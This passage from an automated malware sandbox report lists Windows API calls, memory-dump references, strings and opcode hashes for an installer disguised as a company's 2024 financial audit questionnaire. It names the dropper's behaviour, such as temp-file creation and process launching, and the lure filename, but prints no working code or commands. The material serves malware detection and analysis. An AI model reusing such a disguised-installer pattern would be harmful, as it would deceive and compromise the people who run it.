                                                                                                    • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                                                      • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                                                                      • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                                                                      • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2470562995.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2470483561.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2470605594.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2470633489.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_10000000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 1791698881-3916222277
                                                                                                    • Opcode ID: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                                    • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                                                                    • Opcode Fuzzy Hash: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                                    • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761
                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32 ref: 00405C45
                                                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403358,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405C60
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CountFileNameTempTick
                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                    • API String ID: 1716503409-1857211195
                                                                                                    • Opcode ID: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                                                                    • Instruction ID: 7ad1723431e3bc490b0335289974808f62bfc0c3cb5a7c029972da154e4cc245
                                                                                                    • Opcode Fuzzy Hash: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                                                                    • Instruction Fuzzy Hash: B9F09676604308BBEB009F59DC45E9BB7A8EB91710F10803AEA00E7140E2B0AD548B54
                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32 ref: 00403192
                                                                                                      • Part of subcall function 0040330F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                                                                    • WriteFile.KERNELBASE(0040BE90,00410218,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                                                                    • SetFilePointer.KERNELBASE(0017C34A,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Pointer$CountTickWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 2146148272-0
                                                                                                    • Opcode ID: dd796cccabb6a84ac49973fb4d75d79188a42d38f0e762117ceda5c208fcbf67
                                                                                                    • Instruction ID: 5e1569cfb0b545446f3df2febc41285ecf4c3109a81fe664ff5153a665b75745
                                                                                                    • Opcode Fuzzy Hash: dd796cccabb6a84ac49973fb4d75d79188a42d38f0e762117ceda5c208fcbf67
                                                                                                    • Instruction Fuzzy Hash: D9418B72504205DFDB109F29EE84AA63BADF74431671441BFE605B22E1C7B96D418BAC
                                                                                                    APIs
                                                                                                      • Part of subcall function 00405234: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040526C
                                                                                                      • Part of subcall function 00405234: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040527C
                                                                                                      • Part of subcall function 00405234: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll,00000000,00000000,00000000), ref: 0040528F
                                                                                                      • Part of subcall function 00405234: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll), ref: 004052A1
                                                                                                      • Part of subcall function 00405234: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004052C7
                                                                                                      • Part of subcall function 00405234: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004052E1
                                                                                                      • Part of subcall function 00405234: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052EF
                                                                                                      • Part of subcall function 00405703: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 0040572C
                                                                                                      • Part of subcall function 00405703: CloseHandle.KERNEL32(?), ref: 00405739
                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                                                                    • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                                                    • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                    • String ID:
                                                                                                    • API String ID: 3585118688-0
                                                                                                    • Opcode ID: 02fa1bc128315b3629317a3bcc306fe2355556fdb58621b14dfff1a53f7edb22
                                                                                                    • Instruction ID: a183927f8f084cdb8571cb7bd96d2202481db38f7d29b0955d5094ceef348c04
                                                                                                    • Opcode Fuzzy Hash: 02fa1bc128315b3629317a3bcc306fe2355556fdb58621b14dfff1a53f7edb22
                                                                                                    • Instruction Fuzzy Hash: EB116171900104EBCF109FA0CD459DF7AB5EB44359F20447BE501B61E1C3794A92DFAA
                                                                                                    APIs
                                                                                                    • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 0040572C
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00405739
                                                                                                    Strings
                                                                                                    • Error launching installer, xrefs: 00405716
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                    • String ID: Error launching installer
                                                                                                    • API String ID: 3712363035-66219284
                                                                                                    • Opcode ID: 89d61fbbff7ca59509715ff9813e48ed7354dff71edc3a11a34e7e31b27a8334
                                                                                                    • Instruction ID: 68da1b5efeb229702bef63955ccdeefd44cba6198d5a5f20aa9a51b41b675f94
                                                                                                    • Opcode Fuzzy Hash: 89d61fbbff7ca59509715ff9813e48ed7354dff71edc3a11a34e7e31b27a8334
                                                                                                    • Instruction Fuzzy Hash: 59E0BFB4A0420ABFFB109F64EC49F7B766CE710704F808521BD15F2250D7B4AC108A79
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406220: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406283
                                                                                                      • Part of subcall function 00406220: CharNextW.USER32(?,?,?,00000000), ref: 00406292
                                                                                                      • Part of subcall function 00406220: CharNextW.USER32(?,"C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406297
                                                                                                      • Part of subcall function 00406220: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 004062AA
                                                                                                    • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00403347
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Char$Next$CreateDirectoryPrev
                                                                                                    • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                                    • API String ID: 4115351271-3512041753
                                                                                                    • Opcode ID: 39a545118ff9827536aa834da4382a8a1ba00f0c03fbe255a403a3aa64501383
                                                                                                    • Instruction ID: c6abd0214a64de7cadaa734fac41eb8380666afbcf661e8bafaab08763a3f1d5
                                                                                                    • Opcode Fuzzy Hash: 39a545118ff9827536aa834da4382a8a1ba00f0c03fbe255a403a3aa64501383
                                                                                                    • Instruction Fuzzy Hash: 37D0522210A93130C84136663E02BCF080CCF0A32AF22807BF804B00C1CB3C1A8208FE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fbba942c1d572bf921735f4c6026e3062a5fb5b34c07d0b910559572d6fe18fe
                                                                                                    • Instruction ID: 341b99abf03f2e1941eb6220a2ba2fa20bbc036e9949a5bf9c2c078605d2769f
                                                                                                    • Opcode Fuzzy Hash: fbba942c1d572bf921735f4c6026e3062a5fb5b34c07d0b910559572d6fe18fe
                                                                                                    • Instruction Fuzzy Hash: 9DA13471E00229DBDB28CFA8C8547ADBBB1FF48305F11816AD856BB281C7785A96CF44
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9b416045f54723c0aced5ed7493083a206bc2f8aaa63c3fa24b1832e5229f487
                                                                                                    • Instruction ID: b24004e2459b3715c883c1996b24246953ff0fb47fcdf85fedfa1614f6e92f62
                                                                                                    • Opcode Fuzzy Hash: 9b416045f54723c0aced5ed7493083a206bc2f8aaa63c3fa24b1832e5229f487
                                                                                                    • Instruction Fuzzy Hash: 60911270E00228DBDF28CF98C854BADBBB1FF44305F15816AD856BB291C7789996CF44
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d1d8e67d3672fe33e56554ed692c604aaa9ef945de69a5b70ae3e54f11edcfbe
                                                                                                    • Instruction ID: 0c07c17b414ad8f17a3ff3e8587382d040bd297e960d91c66a6d9af6720fecf2
                                                                                                    • Opcode Fuzzy Hash: d1d8e67d3672fe33e56554ed692c604aaa9ef945de69a5b70ae3e54f11edcfbe
                                                                                                    • Instruction Fuzzy Hash: 38815571D00228DFDF24CFA8C844BADBBB1FB44305F25816AD456BB291C7389A96CF54
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 16c3da451b00ed7501bdbc73778925f50314777a9f5d312f132e9d4e74f014bb
                                                                                                    • Instruction ID: 40c7cf361161e00566e5adfab28d3a5c75941d24eb7bbcfefb24c15ac497d971
                                                                                                    • Opcode Fuzzy Hash: 16c3da451b00ed7501bdbc73778925f50314777a9f5d312f132e9d4e74f014bb
                                                                                                    • Instruction Fuzzy Hash: 91815571D04228DBDF28CFA8C844BADBBB1FB44345F21816AD856BB2C1C7785A96CF45
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0cc07006cc7c9aef3fafa63e8afbe90e4e7d7e8d46648082bd87270dbbc6feb7
                                                                                                    • Instruction ID: 456f5d8fd794945b55b5d9b3679d3b1ecbaa17202882ac546044f61b7aaf63b3
                                                                                                    • Opcode Fuzzy Hash: 0cc07006cc7c9aef3fafa63e8afbe90e4e7d7e8d46648082bd87270dbbc6feb7
                                                                                                    • Instruction Fuzzy Hash: 10711471D04228DFDF28CF98C844BADBBB1FB48305F15806AD856BB281D7389996DF54
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2464318106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2464296742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464338232.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464380224.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2464622030.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: eec15c9fa71d2bb8ac0e9ab2641b80d47be28fb4f34c6eac6740816efd5aae2a
                                                                                                    • Instruction ID: 8bd2b1db5987d4e4b96b583130c6a33f56c1bdc1121660429b57e4b15e5e4dee
                                                                                                    • Opcode Fuzzy Hash: eec15c9fa71d2bb8ac0e9ab2641b80d47be28fb4f34c6eac6740816efd5aae2a
                                                                                                    • Instruction Fuzzy Hash: DD713471D04228DFDF28CF98C844BADBBB1FB48305F25806AD856BB291C7389996DF54
                                                                                                    Memory Dump Source
